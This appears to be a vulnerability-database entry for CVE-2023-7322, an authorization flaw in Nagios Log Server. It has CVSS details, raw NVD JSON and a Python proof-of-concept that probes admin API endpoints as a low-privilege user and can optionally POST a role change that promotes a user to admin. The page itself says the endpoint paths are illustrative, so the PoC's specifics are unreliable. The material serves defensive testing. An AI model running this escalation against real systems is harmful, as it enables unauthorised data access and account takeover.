Security Vulnerability Report
CVE-2023-7322 CVSS 8.1 HIGH

CVE-2023-7322

Published: 2025-10-30 22:15:44
Last Modified: 2025-11-06 16:20:51

Description

Nagios Log Server versions prior to 2024R1 contain an incorrect authorization vulnerability. Users who lacked the required API permission were nevertheless able to invoke API endpoints, resulting in unintended access to data and actions exposed via the API. This incorrect authorization check could allow authenticated but non-privileged users to read or modify resources beyond their intended rights.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:* - VULNERABLE
Nagios Log Server < 2024R1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the API paths it probes are illustrative examples (the script itself labels them "Example"), not documented Nagios Log Server routes, so confirm them against the target before treating a 200 response as proof of the flaw; also note that its final step attempts a privilege-changing write to an existing user account, which must only be run against systems you are explicitly authorized to modify.
python
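import json
import os
import sys

# CVE-2023-7322 PoC - Nagios Log Server Incorrect Authorization
# Target: Nagios Log Server < 2024R1
# Vulnerability: Authenticated users can invoke privileged API endpoints
#
# `requests` is imported lazily inside exploit_cve_2023_7322() so that the
# module loads (and its pure helpers can be exercised) without the dependency.

__all__ = ["exploit_cve_2023_7322", "classify_status"]

# Lab defaults; override through the environment rather than editing real
# credentials into the file.
TARGET_URL = os.environ.get("NLS_TARGET_URL", "http://target-nagios-log-server.local")
USERNAME = os.environ.get("NLS_USERNAME", "low_privilege_user")
PASSWORD = os.environ.get("NLS_PASSWORD", "user_password")

# Per-request timeout in seconds. The original issued unbounded requests and
# would hang indefinitely on a filtered port.
REQUEST_TIMEOUT = 10

# NOTE(review): these are the illustrative paths carried over from the
# original PoC, not verified Nagios Log Server routes. Confirm them against
# the target's API before treating a 200 here as proof of the flaw.
PRIVILEGED_ENDPOINTS = (
    "/api/admin/users",
    "/api/admin/config",
    "/api/admin/settings",
    "/api/v1/system/info",
)


def classify_status(status_code):
    """Translate a privileged endpoint's HTTP status into a finding label.

    Args:
        status_code: HTTP status returned for a request that should have
            required admin permission.

    Returns:
        ``"vulnerable"`` for 200 (the endpoint answered a low-privilege
        caller), ``"protected"`` for 403 (the expected authorization
        failure), ``"unexpected"`` for anything else (401, 404, 5xx, ...),
        which needs manual inspection rather than an automatic verdict.
    """
    if status_code == 200:
        return "vulnerable"
    if status_code == 403:
        return "protected"
    return "unexpected"


def _login(session, target_url, username, password, verify_tls):
    """Authenticate the low-privilege account; True on HTTP 200."""
    response = session.post(
        f"{target_url}/api/auth/login",
        json={"username": username, "password": password},
        verify=verify_tls,
        timeout=REQUEST_TIMEOUT,
    )
    if response.status_code != 200:
        print(f"[-] Authentication failed: {response.status_code}")
        return False
    print("[+] Successfully authenticated with low-privilege account")
    return True


def _probe_endpoints(session, target_url, verify_tls):
    """GET every candidate privileged endpoint (read-only).

    Returns the list of endpoints that answered 200 to the low-privilege
    session. A 200 carrying an HTML login page rather than API data would be
    a false positive, so the first 500 bytes of each body are printed for
    the operator to check.
    """
    accessible = []
    for endpoint in PRIVILEGED_ENDPOINTS:
        response = session.get(
            f"{target_url}{endpoint}", verify=verify_tls, timeout=REQUEST_TIMEOUT
        )
        verdict = classify_status(response.status_code)
        if verdict == "vulnerable":
            accessible.append(endpoint)
            print(f"[CRITICAL] VULNERABLE: {endpoint} accessible with low privileges")
            print(f"Response: {response.text[:500]}")
        elif verdict == "protected":
            print(f"[-] Protected: {endpoint} - Access denied (expected behavior)")
        else:
            print(f"[!] Unexpected response from {endpoint}: {response.status_code}")
    return accessible


def _attempt_privilege_change(session, target_url, verify_tls):
    """Destructive step: try to set user 1's role to admin via the admin endpoint.

    Run only with explicit authorization -- a success changes a real account
    on the target. Returns True on HTTP 200.
    """
    response = session.post(
        f"{target_url}/api/admin/users/modify",
        json={"user_id": 1, "role": "admin", "action": "escalate_privileges"},
        verify=verify_tls,
        timeout=REQUEST_TIMEOUT,
    )
    if response.status_code == 200:
        print("[CRITICAL] Successfully modified privileged resource!")
        return True
    print(f"[-] Modification rejected: {response.status_code}")
    return False


def exploit_cve_2023_7322(
    target_url=TARGET_URL,
    username=USERNAME,
    password=PASSWORD,
    *,
    session=None,
    verify_tls=True,
    attempt_modify=False,
):
    """Check a Nagios Log Server instance for CVE-2023-7322 (incorrect authorization).

    Logs in as a low-privilege user, then requests endpoints that should
    require admin permission. By default the check is read-only; the
    role-changing write from the original PoC runs only when
    ``attempt_modify`` is True.

    Args:
        target_url: Base URL of the instance, without a trailing slash.
        username: Login of a non-admin account.
        password: Password for that account.
        session: Optional requests-compatible session (``get``/``post``
            returning objects with ``status_code`` and ``text``). A fresh
            ``requests.Session`` is created when None; injectable for tests.
        verify_tls: Verify the server certificate. The original passed
            ``verify=False`` unconditionally; disable only for lab hosts
            with self-signed certificates.
        attempt_modify: Also send the destructive role-change request.

    Returns:
        True if any privileged endpoint was readable or the modification
        succeeded. (The original returned False for read-only access, so a
        vulnerable host could be reported as clean.) False otherwise,
        including on login failure or a transport error.
    """
    if session is None:
        try:
            import requests
        except ImportError:
            print("[-] The 'requests' package is required: pip install requests")
            return False
        session = requests.Session()

    try:
        if not _login(session, target_url, username, password, verify_tls):
            return False
        accessible = _probe_endpoints(session, target_url, verify_tls)
        modified = False
        if attempt_modify:
            modified = _attempt_privilege_change(session, target_url, verify_tls)
        else:
            print("[*] Skipping destructive modification step (pass attempt_modify=True / --modify to run it)")
    except OSError as exc:
        # requests.RequestException subclasses OSError, so connection and
        # timeout failures land here without importing requests in this scope.
        print(f"[-] Request failed: {exc}")
        return False

    return bool(accessible) or modified


if __name__ == "__main__":
    print("CVE-2023-7322 PoC - Nagios Log Server Incorrect Authorization")
    print("=" * 60)
    flags = sys.argv[1:]
    # --modify enables the role-change write; --insecure disables TLS verification.
    exploit_cve_2023_7322(
        verify_tls="--insecure" not in flags,
        attempt_modify="--modify" in flags,
    )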

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-7322", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:44.200", "lastModified": "2025-11-06T16:20:51.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server versions prior to 2024R1 contain an incorrect authorization vulnerability. Users who lacked the required API permission were nevertheless able to invoke API endpoints, resulting in unintended access to data and actions exposed via the API. This incorrect authorization check could allow authenticated but non-privileged users to read or modify resources beyond their intended rights."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-log-server-2024r1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-log-server-incorrect-authorization-granting-full-api-access", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}